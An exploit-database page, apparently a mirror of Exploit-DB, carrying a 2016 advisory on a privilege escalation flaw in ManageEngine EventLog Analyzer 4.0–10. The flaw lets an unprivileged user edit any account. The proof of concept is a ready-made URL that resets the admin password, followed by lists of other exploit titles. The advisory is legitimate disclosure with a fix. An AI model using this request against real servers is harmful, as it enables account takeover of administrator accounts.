Menu

Search for hundreds of thousands of exploits

"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation"

Author

Exploit author

GraphX

Platform

Exploit platform

multiple

Release date

Exploit published date

2016-02-01

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

# Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation
# Exploit Author: @GraphX
# Vendor Homepage:http://www.manageengine.com
# Version: 4.0 - 10


1. Description:
The manageengine eventlog analyzer fails to properly verify user
privileges when making changes via the userManagementForm.do.  An
unprivileged user would be allowed to make changes to any account by
changing the USER_ID field to a number corresponding to another user.
Testing discovered that the default admin and guest accounts are 1 and 2.

Considering the recent similar vulnerabilities discovered in a more
current version of a similar product by ManageEngine, it is possible that
more versions of the software including current, are vulnerable. According
to the vendor this is fixed in version 10.8.


2. Proof of Concept

        -login as an unprivileged user
        -Use the following URL to change the admin password to "admin"

http://<IP_ADDRESS>/event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin


3. Solution:
Upgrade to 10.8
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJWr4qsAAoJEGoTpzhfiAPxDvwQAKjV4QxOQXnC+LReaCtBBx/7
aZ8YVTrVZbWlvWoQsvksYmF5HRgQsD91pSYhbQ2IkPVGiDnl8MwTek8fnv7p62Ep
7ZL3sv+QB2IRi73TW3uE32rD5LBikv9qrVQfnr8uI8xM+HRjX347gABYVp7TAyFq
nq6oWT9ngdEgBMDb0x4tlCRSvodaWygeD+xOy3Pb/HlpZBMnwrvKwiRxSbvDKQw9
kM3P3uVcRIVFLaFaEMJUrWc/iliCLPaKbd9IDXoVp4tBoFj6uMNSdR8VeIDWQg5A
+RQH0oAsx1wqJOY02BpDXkMAEAIeXH1TEFz5vOvpTubLxC34aFHabLCMWjdCc0aK
+lE9HZLfzwRADo5KtdQAmiLjlllNsOuf58MUjtdGr+ODqyDjoJOoZcqm5RUfe0M4
EGpT0+6Xo6pWJMfM6fOnZT9OZd8hLac30Dz4GQTjFncSpVsMs9ED6NMHh4+nQiAk
r991kL4SyjF7YDV+rG86fvbWOfNpWrHZb/yLwAvAp7OtZBkDFmwoTPVtVSJHJ9N2
zQR4ufM0UnqVa3zKMzplngVnASStmg9HY4hxH8sUm7NYMq2ULimz1xTvg2jYoxWZ
Fp9JsEdiT/vdCWhqBthR4B3rVc/EtDasDHdzGHvp60HihAaF9GBG7RmgHUc13lp9
UAk1W7ydKCcFdw1HHFfL
=RJuV
-----END PGP SIGNATURE-----
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2016-02-01 "ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation" webapps multiple GraphX 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected